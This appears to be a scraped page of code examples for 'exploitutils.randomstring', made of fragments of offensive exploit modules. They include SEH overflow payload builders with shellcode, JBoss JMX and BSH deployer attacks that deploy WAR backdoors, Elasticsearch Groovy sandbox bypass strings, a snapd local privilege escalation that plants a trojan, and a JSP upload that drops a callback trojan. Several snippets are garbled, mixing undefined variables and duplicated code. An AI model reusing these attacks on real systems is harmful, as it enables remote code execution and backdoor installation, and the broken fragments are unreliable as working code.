예제 #1
0
    def login(self, username, password, db="master"):
        """
    Login will return the results of the query packet - this is needed to capture the environment you have logged into
    """

        lpacket = Login()
        lpacket.Username = username
        lpacket.Password = password
        if self.ClientName:
            lpacket.Hostname = self.ClientName
        else:
            lpacket.Hostname = exploitutils.randomstring(6)

        lpacket.Servername = str(self.hostname)
        lpacket.Database = db
        lpacket.Appname = lpacket.LibraryName = exploitutils.randomstring(6)
        try:
            self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
            try:
                self.s.connect((self.hostname, self.port))
                self.s.send(lpacket.raw())
            except:
                print "Connect error"
                return None
        except socket.error, msg:
            raise MSSQLError, "MSSQL Error on socket: %s" % str(msg)
예제 #2
0
 def __init__(self):
     tcpexploit.__init__(self)
     self.name = NAME
     self.host = ''
     self.hostname = ''
     self.port = 80
     self.ssl = False
     self.base_url = ""
     self.authordll_path = "/_vti_bin/_vti_aut/author.dll"
     self.authordll_url = ""
     self.info_path = "/_vti_inf.html"
     self.respath = os.path.abspath(
         os.path.join(os.path.dirname(__file__), "Resources/"))
     self.tmppath = None
     self.mosdef_type = "UNIVERSAL"  # | HTTP | DNS
     self.dns_domain = None
     self.http_ssl = False
     self.UA = None
     self.asp_filename = exploitutils.randomstring(8) + ".asp"
     self.aspx_filename = exploitutils.randomstring(8) + ".aspx"
     self.cs_filename = exploitutils.randomstring(8) + ".cs"
     self.filenames = []
     self.auth_user = ""
     self.auth_password = ""
     self.auth_type = "BASIC"
     self.trigger_urls = []
     self.working_trigger_url = ""
     self.fp_version = "4.0.2.2611"  # and old version as default (FP 2002)
     self.success_regex = re.compile(
         "message=successfully put document [\'\"](.*)[\'\"] as [\'\"](.*)[\'\"]"
     )
     self.fail_regex = re.compile("status=(\d+).*<li>msg=(.*)<li>",
                                  re.DOTALL)
     self.setInfo(DESCRIPTION)
 def __init__(self):
     tcpexploit.__init__(self)
     self.name = NAME
     self.host = ''
     self.hostname = ''
     self.port = 8080  # this must be the jboss port used for all pages and not the console port (9990)
     self.path = '/console'
     self.ssl = False
     self.base_url = ""
     self.console_full_url = ""
     self.console_base_url = ""
     self.console_port = 8080  # really needed?
     self.respath = os.path.abspath(
         os.path.join(os.path.dirname(__file__), "Resources/"))
     self.tmppath = None
     self.mosdef_type = "UNIVERSAL"  # | HTTP | DNS
     self.dns_domain = None
     self.http_ssl = False
     self.jsp_filename = exploitutils.randomstring(8) + ".jsp"
     self.servlet_name = exploitutils.randomstring(8)
     self.war_filename = "%s.war" % self.servlet_name
     self.basicauth_user = ""
     self.basicauth_password = ""
     self.deploy_wait = 10  # secs to wait for target to finish deploying war
     self.setInfo(DESCRIPTION)
 def __init__(self):
     tcpexploit.__init__(self)
     self.name = NAME
     self.host = ''
     self.hostname = ''
     self.port = 8080
     self.path = '/jmx-console'
     self.ssl = False
     self.base_url = ""
     self.htmladaptor_url = ""
     self.respath = os.path.abspath(
         os.path.join(os.path.dirname(__file__), "Resources/"))
     self.tmppath = None
     self.mosdef_type = "UNIVERSAL"  # | HTTP | DNS
     self.dns_domain = None
     self.http_ssl = False
     self.web_server_port = 9090
     self.UA = None
     self.use_bypass = False
     self.jsp_filename = exploitutils.randomstring(8) + ".jsp"
     self.servlet_name = exploitutils.randomstring(8)
     self.war_filename = "%s.war" % self.servlet_name
     self.basicauth_user = ""
     self.basicauth_password = ""
     self.deploy_wait = 10  # secs to wait for target to finish deploying war
     self.trigger_url = ""
     self.setInfo(DESCRIPTION)
예제 #5
0
 def __init__(self):
     LinuxLocalExploit.__init__(self)
     self.name = NAME
     self.node = None
     self.client_sockname = '/tmp/%s;uid=0' % randomstring(8)
     self.server_sockname = '/run/snapd.socket'
     self.snapname = randomstring(8).lower()
     self.helpername = randomstring(8)
     self.snapdata = PAYLOAD['snapdata']  # squash filesystem
     self.offset = int(
         PAYLOAD['offset'])  # offset to encode binary in squash filesystem
     self.sizedecode = int(PAYLOAD['sizedecode'])  # size of decode binary
     self.remote_helper = ''
     self.remote_exp = self.client_sockname
예제 #6
0
def makeSploit(TARGET, PAYLOAD, PARGS):
    """
    Construct the attack
    """
    OFFSET = 515
    BADCHARS = '\x00\x0a\x0d'
    stack = "\x90" * 12
    stack += shellcode.generateshellcode(PAYLOAD, BADCHARS, str(PARGS))
    stack += exploitutils.randomstring(OFFSET - len(stack))
    stack += "\xeb\x06\x90\x90"  # Next SEH
    stack += TARGET  # SEH
    stack += (
        "\xdb\xc5\xbd\xfc\x37\x63\x33\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x03"
        "\x31\x6f\x17\x83\xc7\x04\x03\x93\x24\x81\xc6\xea\x8f\x81\x2c\xec"
        "\x0f\xf5\xcb")

    junk = "".join(
        choice(ascii_uppercase) for i in range(off_set - len(egg + shellcode)))
    junk2 = "".join(
        choice(ascii_uppercase)
        for i in range(822 - len(egg + shellcode + junk + ret + egg_hunter)))
    SPLOITSTRING = ("HEAD /" + egg + shellcode + junk + ret + egg_hunter +
                    " HTTP/1.0\r\n\r\n")

    SPLOITSTRING = "a0001 LIST }" + stack + "}\r\n"
    return SPLOITSTRING
예제 #7
0
 def __init__(self):
     httpclientside.__init__(self)
     self.version = 0
     self.name = NAME
     self.nops = ""
     self.filename = randomstring(8) + ".html"
     self.plugin_info = None  # we want clientd to give us a plugin dict
예제 #8
0
def makeSploit(TARGET, PAYLOAD, ARGS):
    """
    Construct the attack
    """
    OFFSET = 230
    BADCHARS = '\x00\x0a\x0d'

    stack = exploitutils.randomstring(OFFSET)
    stack += TARGET
    stack += exploitutils.randomstring(8)
    stack += "\x81\xc4\x54\xf2\xff\xff"  # Move ESP to prevent shellcode overwriting itself
    # Generate and encode the shellcode
    SHELLCODE = shellcode(PAYLOAD, ARGS)
    stack += encoder.xor(SHELLCODE, BADCHARS)
    stack += exploitutils.randomstring(1000 - len(stack))
    SPLOITSTRING = "USER " + stack + "\r\n"
    return SPLOITSTRING
예제 #9
0
 def getargs(self):
     self.getarg("dns_domain")
     self.callback_host = self.getarg("callback_host")
     self.callback_port = self.getarg("callback_port")
     self.encrypted = self.getarg("encrypted")
     self.ssl = self.getarg("ssl")
     self.mosdef_type = self.argsDict.get("mosdef_type_value",
                                          self.mosdef_type).upper().strip()
     self.jsp_filename = self.getarg("jsp_filename")
     if self.jsp_filename.lower() in ("random", ""):
         self.jsp_filename = exploitutils.randomstring(8)
     if not self.jsp_filename.endswith(
             ".jsp"):  # make sure we set the extension
         self.jsp_filename = "%s.jsp" % self.jsp_filename
     self.servlet_name = self.getarg("servlet_name")
     if self.servlet_name.lower() in ("random", ""):
         self.servlet_name = exploitutils.randomstring(8)
     self.war_filename = "%s.war" % self.servlet_name
예제 #10
0
def makeSploit( TARGET, PAYLOAD, ARGS ):
    
    
    badchars = "\x00\x0a\x0d\x2e\x5c"
    start = "[playlist]\r\nFile1=\\\\"
    shellcode = "\x90" * 856
    sub_esp("\x81\xec\x56\x03\x00\x00\xff\xe4")
    
    stage2 = encoder.xor(sub_esp, badchars)
    

    stage1 = "\x83\xec\x58\x83\xec\x54\xff\xe4\x90\x90\x90"
    end = "\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n"
    
    SHELLCODE = encoder.xor((shellcode(PAYLOAD, ARGS)))

    junk = "\x41" * (854 - len(shellcode))
    junk2 = "\x90" * (168 - len(stage2))
    buffer = start + shellcode + junk + stage2 + junk2 + eip + stage1 + end
    buffer = start + shellcode + junk + stage2 + junk2 + eip + stage1 + end
    f = open("poc.pls","w")
    f.write(buffer)
    f.close

    print("\nFile Created\n")
    
    
    
    
    
    # Exploit variables
    OFFSET=768
    BADCHARS='\x00\x0a\x0d\x20\x7b'
    
    # Generate and encode the shellcode
    #exploitutils.print_status("Generating shellcode")
    SHELLCODE = shellcode( PAYLOAD, ARGS )
    ENCODED_SHELLCODE = encoder.xor( SHELLCODE, BADCHARS )
    
    # Construct the attack
    #exploitutils.print_status( "Carving out the stack")
    
    stack= "\x90"*12
    stack+= ENCODED_SHELLCODE
    stack+= exploitutils.randomstring( OFFSET - len(stack) )
    stack+= "\xeb\x06\x90\x90" # Next SEH
    stack+= TARGET # SEH
    stack+=("\xdb\xc5\xbd\xfc\x37\x63\x33\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x03"
    "\x31\x6f\x17\x83\xc7\x04\x03\x93\x24\x81\xc6\xea\x8f\x81\x2c\xec"
    "\x0f\xf5\xcb")

    SPLOITSTRING = "a0001 LIST }" + stack + "}\r\n"
    return SPLOITSTRING
예제 #11
0
 def make_beanshelldeployer_payload(self, bsh_payload):
     data = {}
     #data['action']      = 'invokeOpByName'
     data['action'] = 'invokeOp'
     data['name'] = 'jboss.deployer:service=BSHDeployer'  # for JBoss 4.x
     #data['name']        = 'jboss.deployment:id=BSHScriptDeployer,type=Component' # JBoss 5.x
     #data['methodName']  = 'createScriptDeployment'
     data['methodIndex'] = '5'
     #data['argType']     = 'java.lang.String'
     data['arg0'] = bsh_payload
     #data['argType']     = 'java.lang.String'
     data['arg1'] = exploitutils.randomstring(8) + '.bsh'
     return data
예제 #12
0
    def create_post_request(self):
        # we need to create a file of the same size as the file
        # in the squash filesystem to avoid break the format
        helperencode, arch = self.get_local_helper()
        helperencode = helperencode.ljust(self.sizedecode,
                                          '\x00').encode('base64')
        helperencode = helperencode.replace('\n', '')

        # create an unique snap to avoid being ignored
        squashfs = self.snapdata.replace('snapname', self.snapname)
        squashfs = squashfs.replace('trojname',
                                    self.helpername)  # random trojan filename
        squashfs = squashfs.replace('ARCHX', arch)

        # replace original file in squash filesystem for our helper
        squashfs = squashfs[:self.offset] + helperencode + squashfs[
            self.offset + len(helperencode):]

        boundary = randomstring(8).encode('hex')
        fname = randomstring(8)

        post_data = '\n--------------------------BOUNDARY\n'
        post_data += 'Content-Disposition: form-data; name="devmode"\n\n'
        post_data += 'true\n'
        post_data += '--------------------------BOUNDARY\n'
        post_data += 'Content-Disposition: form-data; name="snap"; filename="FNAME.snap"\n\n'
        post_data += squashfs + '\n'
        post_data += '--------------------------BOUNDARY--'

        post_data = post_data.replace('BOUNDARY', boundary)
        post_data = post_data.replace('FNAME', fname.lower())

        http_post = 'POST /v2/snaps HTTP/1.1\r\n'
        http_post += 'Host: 127.0.0.1\r\n'
        http_post += 'Content-Type: multipart/form-data; boundary=------------------------%s\r\n' % boundary
        http_post += 'Expect: 100-continue\r\n'
        http_post += 'Content-Length: %d\r\n\r\n' % len(post_data)

        return http_post, post_data
 def ensure_dynamic_scripting(self):
     """
     For some reason it looks like Groovy dynamic scripts are enabled by default but
     it doesn't work correctly unless you force it to index some local script.
     By testing we found out that issuing a simple request we can make that happen.
     We run this just in case to make sure the target will in fact run scripts
     """
     # the request would be something like:
     # curl -XPOST http://localhost:9200/_scripts/groovy/dummy -d '{ "script": "print \"dummy\"" }'
     scriptname = exploitutils.randomstring(8)
     ua = self.setup_UA("%s/_scripts/groovy/%s" %
                        (self.base_url, scriptname))
     #XXX: this could be probably improved by checking the response code or text
     response = ua.POST("", '{ "script": "print \\"%s\\"" }' % scriptname)
예제 #14
0
 def update_war_filename(self):
     """
     Every time we try a different method to deploy our WAR file, we change
     the WAR filename to avoid conflicts that might arise when uploading the
     same name more than once.
     """
     # by the time this method is called, the WAR file must have been created
     old_war_filename = os.path.join(self.tmppath, self.war_filename)
     self.servlet_name = exploitutils.randomstring(8)
     self.war_filename = "%s.war" % self.servlet_name
     self.trigger_url = self.base_url + "/%s/%s" % (self.servlet_name,
                                                    self.jsp_filename)
     new_war_filename = os.path.join(self.tmppath, self.war_filename)
     os.rename(old_war_filename, new_war_filename)
예제 #15
0
    def pwn_it(self, current_vhost, base_uri):
        """
        This function takes care of the trojan creation and pushes it on the
        server. It also triggers its execution and will return 1 if the payload
        successfully executed, 0 if not.
        """
        ret = 0
        normal_uri = base_uri + exploitutils.randomstring(8) + '.jsp'
        bogus_uri = normal_uri + '/'

        # First let's build the trojan
        if not self.build_trojan():
            self.setInfo("%s - done (failed)" % NAME)
            return 0

        # Then convert it into a suitable base64 payload
        f = open(self.tmppath + '/' + 'callback_windows.exe', 'rb')
        b64_payload = f.read().encode('base64')
        f.close()

        # Open the JSP template
        f = open(os.path.join(self.respath, "callback.jsp.template"))
        jsp_payload = f.read()
        f.close()

        # Replace the QUIRK keyword with the base64 encoded payload
        jsp_payload2 = jsp_payload.replace("QUIRK",
                                           b64_payload.replace('\n', ''))

        # Push the JSP
        (http_code, payload) = self.put_request(current_vhost, bogus_uri,
                                                jsp_payload2)
        logging.debug("PUT request returned error code: %s" % http_code)

        # We do skip HTTP code verification. What's important is the payload
        # returned when the GET is used. If the upload + execution is a success
        # a special pattern is returned.
        (http_code, payload) = self.get_request(current_vhost, normal_uri)
        if 'successfully triggered' in payload.read():
            logging.info('Our payload got executed, wait for the shell!')
            ret = 1
        else:
            logging.error('Execution of the payload failed')
            ret = 0

        # Let's clean the JSP file no matter the outcode.
        (http_code, payload) = self.delete_request(current_vhost, bogus_uri)
        logging.debug("PUT request returned error code: %s" % http_code)
        return ret
    def __init__(self):
        tcpexploit.__init__(self)
        self.name = NAME
        self.host = ''
        self.hostname = ''
        self.port = 9200  # default elasticsearch port
        self.path = ''
        self.ssl = False
        self.base_url = ""
        self.respath = os.path.abspath(
            os.path.join(os.path.dirname(__file__), "Resources/"))
        self.tmppath = None
        self.mosdef_type = "UNIVERSAL"  # | HTTP | DNS
        self.dns_domain = None
        self.http_ssl = False
        self.trojan_filename = exploitutils.randomstring(8)
        self.remote_tmp_dir = ""
        self.remote_os_info = [
            "linux", "X64"
        ]  # [os_name, os_arch] - assuming linux x64 by default
        self.basicauth_user = ""
        self.basicauth_password = ""
        self.es_version = ['0', '0', '0']

        self.bypasses_payloads = [
            {
                "getClass": 'java.lang.Math.class.forName(\\"[CLASSNAME]\\")'
            },  # only works for elasticsearch  1.3.x before 1.3.8 and 1.4.x before 1.4.3
            {
                "getClass":
                'groovy.util.GroovyCollections.class.getClassLoader().loadClass(\\"[CLASSNAME]\\")'
            },  # works for all versions up to latest 1.5.2 if dynamic scripting is enabled
            {
                "getClass":
                'java.lang.Math.class.getSuperclass().cast(java.lang.Class).getMethod(\\"forName\\", java.lang.String).invoke(null,\\"[CLASSNAME]\\")'
            },  # works for all versions up to latest 1.5.2 if dynamic scripting is enabled
        ]
        self.working_bypass = -1
        self.getclass_regex = re.compile("\[GETCLASS_(.*)\]")

        self.setInfo(DESCRIPTION)
예제 #17
0
def makeSploit(TARGET, PAYLOAD, ARGS):

    # Exploit variables
    OFFSET = 768
    BADCHARS = '\x00\x0a\x0d\x20\x7b'

    # Generate and encode the shellcode
    SHELLCODE = encoder.xor(shellcode(PAYLOAD, ARGS), BADCHARS)

    stack = "\x90" * 12
    stack += SHELLCODE
    #stack+= encoder.xor(shellcode(PAYLOAD, ARGS), BADCHARS)
    stack += exploitutils.randomstring(OFFSET - len(stack))
    stack += "\xeb\x06\x90\x90"  # Next SEH
    stack += TARGET  # SEH
    stack += (
        "\xdb\xc5\xbd\xfc\x37\x63\x33\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x03"
        "\x31\x6f\x17\x83\xc7\x04\x03\x93\x24\x81\xc6\xea\x8f\x81\x2c\xec"
        "\x0f\xf5\xcb")

    SPLOITSTRING = "a0001 LIST }" + stack + "}\r\n"
    return SPLOITSTRING
예제 #18
0
    def attack_uri(self, current_vhost, uri):
        """
        Perform the attack for a given vhost and using a specific base URI
        """
        if not self.is_directory(uri):
            return 0

        normal_uri = uri + exploitutils.randomstring(8) + '.jsp'
        bogus_uri = normal_uri + '/'

        (http_code, payload) = self.put_request(current_vhost, bogus_uri,
                                                VULN_PATTERN)
        logging.debug("PUT request returned error code: %s" % http_code)
        (http_code, payload) = self.get_request(current_vhost, normal_uri)
        if VULN_PATTERN in payload.read():
            logging.warning(
                'The target is vulnerable, attempting to exploit it via %s' %
                uri)
            # First of all, let's delete this file.
            self.delete_request(current_vhost, bogus_uri)
            # Now let's prepare & push the backdoor
            return self.pwn_it(current_vhost, uri)
        else:
            return 0
예제 #19
0
    def run_deploymentfilerepository_attack(self):
        # It seems that store method can upload text only, so we upload a custom
        # jsp with an encoded WAR that contains all the files needed.
        # It is almost the same approach used with the BSH Script
        self.log("[*] Running DeploymentFileRepository attack")
        f = open(os.path.join(self.tmppath, "deploy.jsp"), "rt")
        payload = f.read()
        f.close()
        filename = exploitutils.randomstring(8)
        data = self.make_deploymentfilerepository_payload(
            filename, ".jsp", payload)
        self.log("Uploading %s.jsp" % filename)
        response = self.do_service_request(data)
        #self.log("[run_deploymentfilerepository_attack] - Response received:\n%s" % response)
        # we use the uploaded jsp to deploy a new war, kind of what we do with BSH Script
        deploy_url = "%s/%s/%s.jsp" % (self.base_url, "web-console", filename)
        self.log("triggering new deploy requesting %s" % deploy_url)
        res = False
        try:
            ua = self.setup_UA(url=deploy_url)
            if self.use_bypass:
                self.log("Using HEAD bypass")
                response, response_code = ua.HEAD("",
                                                  return_response_code=True)
                #XXX: this is just to make it work at the moment
                # The thing is that sometimes a Timeout exception is raised and spkproxy
                # silently ignores it (spkproxy.py:1026) and we get an empty response with -1 as code
                # But the request really works if you run it manually.
                # we force it to 200 so we try triggering.
                if response_code == -1:
                    response_code = 200
            else:
                self.log("Using normal GET request")
                response, response_code = ua.GET("", return_response_code=True)
                #XXX: this is just to make it work at the moment
                # The thing is that sometimes a Timeout exception is raised and spkproxy
                # silently ignores it (spkproxy.py:1026) and we get an empty response with -1 as code
                # But the request really works if you run it manually.
                # we force it to 200 so we try triggering.
                if response_code == -1:
                    response_code = 200

            ## we use urllib2 because we need the response code
            #req = HeadRequest(deploy_url) if self.use_bypass else urllib2.Request(deploy_url)
            #with no_timeout_socket():
            #    response = urllib2.urlopen(req, timeout=TIMEOUT)
            #    content = response.read()

            if response_code == 200:
                #self.log("Response received:\n%s" % content)
                self.wait_for_deploy()
                res = self.trigger_callback()
            else:
                self.log("%s returned code %d" % (deploy_url, response_code))
        except Exception:
            content = ""
            self.debuglog(
                "[run_deploymentfilerepository_attack] - Got an exception\n%s"
                % traceback.format_exc())

        if not res: self.update_war_filename()
        return res